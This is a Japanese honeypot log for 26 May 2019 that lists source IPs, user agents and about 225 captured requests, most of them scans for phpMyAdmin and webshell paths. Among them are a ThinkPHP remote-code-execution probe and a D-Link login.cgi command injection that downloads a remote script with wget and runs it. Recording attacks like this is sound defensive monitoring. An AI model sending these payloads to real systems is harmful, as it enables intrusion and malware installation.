ハニーポット(仮) 観測記録
2019/05/26分です。
phpmyadmin関連のスキャンも戻ってきました。
D-Linkを狙ったリクエストを観測しました。
ThinkPHP狙いのアクセスを観測しました。
Referrer部分にSQL文が仕込まれたリクエスト を確認しました。
総アクセス数:225 (前日比:+196)
都合により
GET / HTTP/1.1
POST / HTTP/1.1
は除いています。
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 110.249.212.46 | China |
| 209 | 148.70.163.109 | China |
| 1 | 172.104.242.173 | United States |
| 1 | 183.192.246.234 | China |
| 9 | 222.169.219.189 | China |
| 2 | 3.0.244.68 | Singapore |
| 1 | 38.103.128.2 | United States |
| 1 | 61.219.11.153 | Taiwan |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 5 | - |
| 1 | Go-http-client/1.1 |
| 1 | Hakai/2.0 |
| 67 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) |
| 35 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0) |
| 1 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0) |
| 1 | Mozilla/5.0 |
| 1 | Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 |
| 102 | Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36 |
| 2 | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 |
| 8 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 1 | ;s:147:\ |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 2 | - | - | - |
| 2 | CONNECT | antei.xyz:443 | HTTP/1.1 |
| 1 | GET | /1x.php | HTTP/1.1 |
| 1 | GET | /admin/index.php | HTTP/1.1 |
| 1 | GET | /admin/mysql2/index.php | HTTP/1.1 |
| 1 | GET | /admin/mysql/index.php | HTTP/1.1 |
| 1 | GET | /admin/phpmyadmin2/index.php | HTTP/1.1 |
| 1 | GET | /admin/phpmyadmin/index.php | HTTP/1.1 |
| 1 | GET | /admin/phpMyAdmin/index.php | HTTP/1.1 |
| 1 | GET | /admin/pma/index.php | HTTP/1.1 |
| 1 | GET | /admin/PMA/index.php | HTTP/1.1 |
| 1 | GET | /appserv.php | HTTP/1.1 |
| 1 | GET | /b.php | HTTP/1.1 |
| 1 | GET | /cacti/plugins/weathermap/editor.php | HTTP/1.1 |
| 1 | GET | /cmdd.php | HTTP/1.1 |
| 2 | GET | /cmd.php | HTTP/1.1 |
| 1 | GET | /cmv.php | HTTP/1.1 |
| 1 | GET | /composer.php | HTTP/1.1 |
| 1 | GET | /composers.php | HTTP/1.1 |
| 1 | GET | /d7.php | HTTP/1.1 |
| 1 | GET | /dbadmin/index.php | HTTP/1.1 |
| 1 | GET | /db_cts.php | HTTP/1.1 |
| 1 | GET | /db/index.php | HTTP/1.1 |
| 1 | GET | /db_pma.php | HTTP/1.1 |
| 1 | GET | /desktop.ini.php | HTTP/1.1 |
| 1 | GET | /Drupal.php | HTTP/1.1 |
| 1 | GET | /elrekt.php | HTTP/1.1 |
| 1 | GET | /hell.php | HTTP/1.1 |
| 1 | GET | /help-e.php | HTTP/1.1 |
| 1 | GET | /help.php | HTTP/1.1 |
| 1 | GET | /HNAP1/ | HTTP/1.1 |
| 1 | GET | /home.php | HTTP/1.1 |
| 1 | GET | /html/public/index.php | HTTP/1.1 |
| 1 | GET | http://110[.]249[.]212[.]46/testget?q=23333&port=80 | HTTP/1.1 |
| 1 | GET | /hue2.php | HTTP/1.1 |
| 1 | GET | /images/!.php | HTTP/1.1 |
| 1 | GET | /images/vuln.php | HTTP/1.1 |
| 2 | GET | /index.php | HTTP/1.1 |
| 1 | GET | /index.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 | HTTP/1.1 |
| 2 | GET | /izom.php | HTTP/1.1 |
| 1 | GET | /java.php | HTTP/1.1 |
| 1 | GET | /knal.php | HTTP/1.1 |
| 1 | GET | /lala-dpr.php | HTTP/1.1 |
| 1 | GET | /lala.php | HTTP/1.1 |
| 1 | GET | /lang.php?f=1 | HTTP/1.1 |
| 1 | GET | /laravel.php | HTTP/1.1 |
| 1 | GET | /license.php | HTTP/1.1 |
| 1 | GET | /login.cgi?cli=aa%20aa%27;wget%20http://45[.]119[.]210[.]135/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ | HTTP/1.1 |
| 1 | GET | /logon.php | HTTP/1.1 |
| 1 | GET | /log.php | HTTP/1.1 |
| 1 | GET | /lol.php | HTTP/1.1 |
| 1 | GET | /muhstik2.php | HTTP/1.1 |
| 1 | GET | /muhstik-dpr.php | HTTP/1.1 |
| 2 | GET | /muhstik.php | HTTP/1.1 |
| 1 | GET | /muhstiks.php | HTTP/1.1 |
| 1 | GET | /myadmin2/index.php | HTTP/1.1 |
| 1 | GET | /myadmin/index.php | HTTP/1.1 |
| 1 | GET | /mysql_admin/index.php | HTTP/1.1 |
| 1 | GET | /mysql-admin/index.php | HTTP/1.1 |
| 1 | GET | /mysqladmin/index.php | HTTP/1.1 |
| 1 | GET | /mysql/index.php | HTTP/1.1 |
| 1 | GET | /new_license.php | HTTP/1.1 |
| 2 | GET | /payload.php | HTTP/1.1 |
| 1 | GET | /phpadmin/index.php | HTTP/1.1 |
| 1 | GET | /phpAdmin/index.php | HTTP/1.1 |
| 1 | GET | /phpmyadmin0/index.php | HTTP/1.1 |
| 1 | GET | /phpmyadmin1/index.php | HTTP/1.1 |
| 1 | GET | /phpmyadmin2/index.php | HTTP/1.1 |
| 1 | GET | /phpMyAdmin-4.4.0/index.php | HTTP/1.1 |
| 1 | GET | /phpmyadmin/index.php | HTTP/1.1 |
| 1 | GET | /phpMyAdmin/index.php | HTTP/1.1 |
| 1 | GET | /phpmyadmin-old/index.php | HTTP/1.1 |
| 1 | GET | /phpmyadmin/scripts/db___.init.php | HTTP/1.1 |
| 1 | GET | /phpMyAdmin/scripts/db___.init.php | HTTP/1.1 |
| 1 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /plugins/weathermap/editor.php | HTTP/1.1 |
| 1 | GET | /PMA2/index.php | HTTP/1.1 |
| 1 | GET | /pma/index.php | HTTP/1.1 |
| 1 | GET | /PMA/index.php | HTTP/1.1 |
| 1 | GET | /pmamy2/index.php | HTTP/1.1 |
| 1 | GET | /pmamy/index.php | HTTP/1.1 |
| 1 | GET | /pmd/index.php | HTTP/1.1 |
| 1 | GET | /pmd_online.php | HTTP/1.1 |
| 1 | GET | /public/index.php | HTTP/1.1 |
| 1 | GET | /_query.php | HTTP/1.1 |
| 1 | GET | /robots.txt | HTTP/1.1 |
| 1 | GET | /rxr.php | HTTP/1.1 |
| 1 | GET | /sane.php | HTTP/1.1 |
| 1 | GET | /scripts/setup.php | HTTP/1.1 |
| 2 | GET | /shell.php | HTTP/1.1 |
| 1 | GET | /spider.php | HTTP/1.1 |
| 1 | GET | /t6nv.php | HTTP/1.1 |
| 1 | GET | /test.php | HTTP/1.1 |
| 1 | GET | /text.php | HTTP/1.1 |
| 1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
| 1 | GET | /TP/html/public/index.php | HTTP/1.1 |
| 1 | GET | /TP/index.php | HTTP/1.1 |
| 1 | GET | /TP/public/index.php | HTTP/1.1 |
| 1 | GET | /undx.php | HTTP/1.1 |
| 1 | GET | /uploader.php | HTTP/1.1 |
| 1 | GET | /up.php | HTTP/1.1 |
| 1 | GET | /webdav/ | HTTP/1.1 |
| 1 | GET | /web/phpMyAdmin/index.php | HTTP/1.1 |
| 1 | GET | /wpc.php | HTTP/1.1 |
| 1 | GET | /wpo.php | HTTP/1.1 |
| 1 | GET | /www/phpMyAdmin/index.php | HTTP/1.1 |
| 1 | GET | /xampp/phpmyadmin/index.php | HTTP/1.1 |
| 1 | GET | /x.php | HTTP/1.1 |
| 1 | GET | /yu.php | HTTP/1.1 |
| 1 | GET | /z.php | HTTP/1.1 |
| 1 | POST | /099.php | HTTP/1.1 |
| 2 | POST | /1.php | HTTP/1.1 |
| 1 | POST | /411.php | HTTP/1.1 |
| 1 | POST | /415.php | HTTP/1.1 |
| 1 | POST | /421.php | HTTP/1.1 |
| 1 | POST | /444.php | HTTP/1.1 |
| 1 | POST | /%75%73%65%72%2e%70%68%70 | HTTP/1.1 |
| 1 | POST | /7o.php | HTTP/1.1 |
| 1 | POST | /887.php | HTTP/1.1 |
| 1 | POST | /888.php | HTTP/1.1 |
| 1 | POST | /9678.php | HTTP/1.1 |
| 1 | POST | /981.php | HTTP/1.1 |
| 1 | POST | /98k.php | HTTP/1.1 |
| 1 | POST | /9.php | HTTP/1.1 |
| 1 | POST | /a411.php | HTTP/1.1 |
| 1 | POST | /aaa.php | HTTP/1.1 |
| 2 | POST | /aa.php | HTTP/1.1 |
| 1 | POST | /aap.php | HTTP/1.1 |
| 1 | POST | /ack.php | HTTP/1.1 |
| 1 | POST | /ak48.php | HTTP/1.1 |
| 1 | POST | /Alarg53.php | HTTP/1.1 |
| 1 | POST | /aotu.php | HTTP/1.1 |
| 1 | POST | /Appc162ee36.php | HTTP/1.1 |
| 1 | POST | /bb.php | HTTP/1.1 |
| 1 | POST | /bbq.php | HTTP/1.1 |
| 1 | POST | /bbqq.php | HTTP/1.1 |
| 1 | POST | /bbr.php | HTTP/1.1 |
| 1 | POST | /cc.php | HTTP/1.1 |
| 2 | POST | /conflg.php | HTTP/1.1 |
| 1 | POST | /db_dataml.php | HTTP/1.1 |
| 1 | POST | /db_desql.php | HTTP/1.1 |
| 1 | POST | /db__.init.php | HTTP/1.1 |
| 1 | POST | /db.init.php | HTTP/1.1 |
| 1 | POST | /db_session.init.php | HTTP/1.1 |
| 1 | POST | /ddd.php | HTTP/1.1 |
| 1 | POST | /defect.php | HTTP/1.1 |
| 1 | POST | /error.php | HTTP/1.1 |
| 1 | POST | /feixiang.php | HTTP/1.1 |
| 1 | POST | /ffr.php | HTTP/1.1 |
| 1 | POST | /hgx.php | HTTP/1.1 |
| 1 | POST | /hhh.php | HTTP/1.1 |
| 1 | POST | /hm.php | HTTP/1.1 |
| 1 | POST | /index.php | HTTP/1.1 |
| 1 | POST | /index.php?s=captcha | HTTP/1.1 |
| 1 | POST | /ioi.php | HTTP/1.1 |
| 1 | POST | /jbb.php | HTTP/1.1 |
| 1 | POST | /jjj.php | HTTP/1.1 |
| 1 | POST | /j.php | HTTP/1.1 |
| 1 | POST | /kpl.php | HTTP/1.1 |
| 1 | POST | /lapan.php | HTTP/1.1 |
| 1 | POST | /lindex.php | HTTP/1.1 |
| 1 | POST | /miao.php | HTTP/1.1 |
| 1 | POST | /m.php?pbid=open | HTTP/1.1 |
| 1 | POST | /mx.php | HTTP/1.1 |
| 2 | POST | /my.php | HTTP/1.1 |
| 1 | POST | /nb.php | HTTP/1.1 |
| 1 | POST | /nnn.php | HTTP/1.1 |
| 1 | POST | /ooi.php | HTTP/1.1 |
| 1 | POST | /pe.php | HTTP/1.1 |
| 1 | POST | /phpstudy.php | HTTP/1.1 |
| 1 | POST | /phpStudy.php | HTTP/1.1 |
| 1 | POST | /pk1914.php | HTTP/1.1 |
| 1 | POST | /pp.php | HTTP/1.1 |
| 1 | POST | /qaq.php | HTTP/1.1 |
| 1 | POST | /q.php | HTTP/1.1 |
| 3 | POST | /qq.php | HTTP/1.1 |
| 1 | POST | /qwq.php | HTTP/1.1 |
| 1 | POST | /rrr.php | HTTP/1.1 |
| 1 | POST | /sheep.php | HTTP/1.1 |
| 1 | POST | /shh.php | HTTP/1.1 |
| 1 | POST | /Skri.php | HTTP/1.1 |
| 1 | POST | /sllolx.php | HTTP/1.1 |
| 1 | POST | /s.php | HTTP/1.1 |
| 1 | POST | /sz.php | HTTP/1.1 |
| 1 | POST | /ttt.php | HTTP/1.1 |
| 1 | POST | /tty.php | HTTP/1.1 |
| 1 | POST | /tyrant.php | HTTP/1.1 |
| 1 | POST | /uuu.php | HTTP/1.1 |
| 1 | POST | /vvv.php | HTTP/1.1 |
| 1 | POST | /wc.php | HTTP/1.1 |
| 1 | POST | /webslee.php | HTTP/1.1 |
| 1 | POST | /weixiao.php | HTTP/1.1 |
| 1 | POST | /whoami.php | HTTP/1.1 |
| 1 | POST | /whoami.php.php | HTTP/1.1 |
| 1 | POST | /wp-admins.php | HTTP/1.1 |
| 1 | POST | /w.php | HTTP/1.1 |
| 1 | POST | /wshell.php | HTTP/1.1 |
| 1 | POST | /wuwu11.php | HTTP/1.1 |
| 1 | POST | /www.php | HTTP/1.1 |
| 1 | POST | /xiaodai.php | HTTP/1.1 |
| 1 | POST | /xiao.php | HTTP/1.1 |
| 1 | POST | /xshell.php | HTTP/1.1 |
| 1 | POST | /xw1.php | HTTP/1.1 |
| 1 | POST | /xw.php | HTTP/1.1 |
| 2 | POST | /xx.php | HTTP/1.1 |
| 1 | POST | /yao.php | HTTP/1.1 |
| 1 | POST | /yyy.php | HTTP/1.1 |
| 1 | POST | /zuo.php | HTTP/1.1 |
| 1 | POST | /zuoshou.php | HTTP/1.1 |
